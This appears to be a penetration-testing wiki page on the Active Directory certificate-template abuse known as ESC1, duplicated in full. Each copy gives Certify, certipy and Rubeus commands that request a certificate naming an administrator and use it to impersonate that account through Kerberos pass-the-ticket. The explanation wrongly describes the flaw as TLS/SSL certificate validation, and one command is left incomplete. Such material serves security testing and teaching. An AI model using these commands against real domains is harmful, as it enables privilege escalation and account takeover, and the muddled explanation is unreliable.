ESC1 – Understand the Arbitrary Subject Alternative Name Vulnerability

The Arbitrary Subject Alternative Name (SAN) Vulnerability refers to a security flaw in certificate validation mechanisms of TLS/SSL protocols.

This vulnerability allows attackers to issue certificates that include unauthorized domain names in the SAN field, potentially enabling phishing attacks or man-in-the-middle (MITM) attacks.

It stems from inadequate verification of the entities that request certificates and the domains listed in the SAN field.

To mitigate this vulnerability, it's essential to:

Implement strict validation processes for certificate requests, ensuring that the entity requesting the certificate has legitimate control over the domains listed in the SAN field.
Use Certificate Transparency logs to monitor and identify potentially malicious certificates.
Employ modern TLS libraries and configurations that adhere to best practices in certificate validation.

To find vulnerable certificate templates you can run:

Certify.exe find /vulnerable

certipy find -u [email protected] -p Passw0rd -dc-ip 172.16.126.128

To abuse this vulnerability to impersonate an administrator one could run:

Certify.exe request /ca:dc.theshire.local-DC-CA /template:VulnTemplate /altname:localadmin

certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC1' -alt '[email protected]'

Then you can transform the generated certificate to .pfx format and use it to authenticate using Rubeus or certipy again:

Rubeus.exe asktgt /user:localdomain /certificate:localadmin.pfx /password:password123! /ptt

certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'corp.local' -dc-ip

PreviousCertPotato NextPage 3

Last updated 9 months ago

Was this helpful?

ESC1 – Understand the Arbitrary Subject Alternative Name Vulnerability

The Arbitrary Subject Alternative Name (SAN) Vulnerability refers to a security flaw in certificate validation mechanisms of TLS/SSL protocols.

This vulnerability allows attackers to issue certificates that include unauthorized domain names in the SAN field, potentially enabling phishing attacks or man-in-the-middle (MITM) attacks.

It stems from inadequate verification of the entities that request certificates and the domains listed in the SAN field.

To mitigate this vulnerability, it's essential to:

Implement strict validation processes for certificate requests, ensuring that the entity requesting the certificate has legitimate control over the domains listed in the SAN field.
Use Certificate Transparency logs to monitor and identify potentially malicious certificates.
Employ modern TLS libraries and configurations that adhere to best practices in certificate validation.

To find vulnerable certificate templates you can run:

Certify.exe find /vulnerable

certipy find -u [email protected] -p Passw0rd -dc-ip 172.16.126.128

To abuse this vulnerability to impersonate an administrator one could run:

Certify.exe request /ca:dc.theshire.local-DC-CA /template:VulnTemplate /altname:localadmin

certipy req 'corp.local/john:[email protected]' -ca 'corp-CA' -template 'ESC1' -alt '[email protected]'

Then you can transform the generated certificate to .pfx format and use it to authenticate using Rubeus or certipy again:

Rubeus.exe asktgt /user:localdomain /certificate:localadmin.pfx /password:password123! /ptt

certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'corp.local' -dc-ip

PreviousCertPotato NextPage 3

Last updated 9 months ago

Was this helpful?